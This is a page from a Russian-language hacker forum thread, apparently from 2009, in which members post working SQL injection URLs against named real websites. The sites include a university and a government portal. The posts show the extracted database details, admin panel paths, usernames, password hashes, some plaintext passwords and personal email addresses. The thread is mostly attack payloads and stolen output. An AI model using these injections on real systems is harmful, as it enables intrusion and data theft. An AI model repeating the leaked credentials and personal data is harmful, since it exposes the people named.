HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 947 из 1602 « Первая < 447847897937 943 944 945 946 947 948 949 950 951 95799710471447 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.06.2009, 11:27
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию
http://www.aquamonit.de/index.php?id=-1+union+select+1,2,3,version(),5,6,7,8--&lang=en

5.0.51a-3ubuntu5.4

http://www.aquamonit.de/index.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8+from+information_schema.tables+group+by+table_ schema+limit+0,1001--&lang=en

comments,gnet_highscore,projects,spam,downloads,gn et_serverlist,update,faq,news,users,gnet_banned,pa ges
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 02.06.2009, 12:21
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
http://www.luxbt.ru/profi.php?rub=501+and+substring(version(),1,1)=5
PR 3, ТИЦ 80
------------
http://magazinru.ru/profi.php?rub=499&action=view&id=970+and+substring (version(),1,1)=4
PR 2, ТИЦ 80
-----------
http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12
5.0.24a-community-max-nt-log:1gb_kat@10.0.1.7:1gb_kat

таблички:
http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,table_name,4,5,6,7,8,9,10,11,1 2+from+information_schema.tables

столбцы таблицы admin:
http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,column_name,4,5,6,7,8,9,10,11, 12+from+information_schema.columns+where+table_nam e=0x61646d696e

http://kubsau.ru/science/public.php?kanarev&kind=-14+union+select+1,2,concat_ws(0x3a,id,fam,im,ot,le vel,log,pas),4,5,6,7,8,9,10,11,12+from+admin

1:Попок:Леонид:Евгеньевич:0:a 4c23c939d0cbc1673fc7c5c50b83756:805b48d7df5911c3f1 7f30173e8cdbe2
2:Лагунов:Владимир:Михайлов ич:0:c67f0777b4f97d43cbdc5c6514329b6d:cf88dd49c4 05318c8bd7ab2cdec90d6b
3:Назарова:Ольга:Владимиров на:0:17a3d901d7fa532f219345816eada58e:89343f0f18 12f8c5b4469ef7177934f7
4:Осенний:Виталий::1:8e8c353d62ba73d 67214e7b9d93cbd91:89f5c3bb44767ddb76c16a5932d1ab4f

админка: http://kubsau.ru/admin/
PR 5, ТИЦ 800
-------------------

Портал федеральных органов власти Сибирского федерального округа
http://www.sfo.nsk.su/gnk/prof.php?action=art&nart=2586+and+substring(versio n(),1,1)=3
ТИЦ 750
Последний раз редактировалось AlexSatter; 02.06.2009 в 12:26..
 
Ответить с цитированием

  #3  
Старый 02.06.2009, 13:41
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
С нами: 8954296

Репутация: 96
По умолчанию
http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*

Super User:root:89905f508ebdc32e7eb0c24fdb118305 pass : LsM8duCa
 
Ответить с цитированием

  #4  
Старый 02.06.2009, 14:05
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
ttp://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4
5.0.22:cinergiedbuser@localhost:cinergiedb

таблицы:
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,table_name,3,4+from+informatio n_schema.tables
Интересующие нас таблицы: login и user

поля login:
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,column_name,3,4+from+informati on_schema.columns+where+table_name=0x6c6f67696e

http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,id,nom,login,pa ssword,email),3,4+from+login

1imitra:dimi:kenzo:dimitra.bouras@gmail.com




2:Samira:sami:alpacino:samira@cinergie.be




3:Sarah:deela:ninou:sdeela@hotmail.com



4oria:doria:admin:dhamelryk@tempo

поля user:
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,column_name,3,4+from+informati on_schema.columns+where+table_name=0x75736572

сами юзеры
http://www.cinergie.be/prof.php?action=display&id=-1023+union+select+1,concat_ws(0x3a,id,login,pass,p seudo,email,privilege),3,4+from+user

перечеслять здесь не буду
 
Ответить с цитированием

  #5  
Старый 02.06.2009, 14:43
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Код:
http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_id=-336+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6--
thechim2_tcpcom@localhost:thechim2_chimneycom:5.0. 77-community
 
Ответить с цитированием

  #6  
Старый 02.06.2009, 15:16
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
<<Lobzik>>
Код:
http://www.lobzik.pri.ee/modules/wfsection/article.php?articleid=-80+union+select+1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+
5.0.41:*:lobzik:*:lobzik@localhost:*:trustix-linux-gnu
 
Ответить с цитированием

  #7  
Старый 02.06.2009, 15:26
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
С нами: 10333826

Репутация: 369


По умолчанию
http://www.madstorage.com/blog.php?id=-720+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20--

Database Version: 4.1.22-log
Database name: massiveattack
User name: massdbus@vlonj200w2.emihosting.com
 
Ответить с цитированием

  #8  
Старый 02.06.2009, 16:15
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
http://iep.univ-lille2.fr/enseignants/prof.php?numens=-511+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11
4.0.24_debian-10sarge2-log:web@localhostrofesseurs

http://www.klanien-male.net/annuaire/prof.php?id=-9+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11
4.0.27-MaxLog:dbo149594951@21
 
Ответить с цитированием

  #9  
Старый 02.06.2009, 17:17
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами: 8953743

Репутация: 59
По умолчанию
Код:
http://www.goldcoastoceanfest.co.uk/news.php?id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+
Код:
web27-gc@79.170.40.171 : web27-gc : 5.0.77-community
паролей в бд нету
админка:
http://www.goldcoastoceanfest.co.uk/admin

В админке походу пасс прописан в самом скрипте, и почемуто мне кажится что она не надёжна...

так как при неправильном вводе пароля меня перекидывает на скрипт login.php с помощью header() и чутьё мне подсказывает что полле него не указан exit() или die()
таким образом мы можем послать составленый с помощю инеткряка GET или POST запрос дабы попасть в админку без авторизации...
Последний раз редактировалось bug1z; 02.06.2009 в 17:20..
 
Ответить с цитированием

  #10  
Старый 02.06.2009, 19:00
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
PR 3
http://www.russ-express.de/stranica.php?sopen=Autogas&file=print&sid=-22+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
5.0.45:web25@localhost:usr_web25_1
 
Ответить с цитированием
Ответ
Страница 947 из 1602 « Первая < 447847897937 943 944 945 946 947 948 949 950 951 95799710471447 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.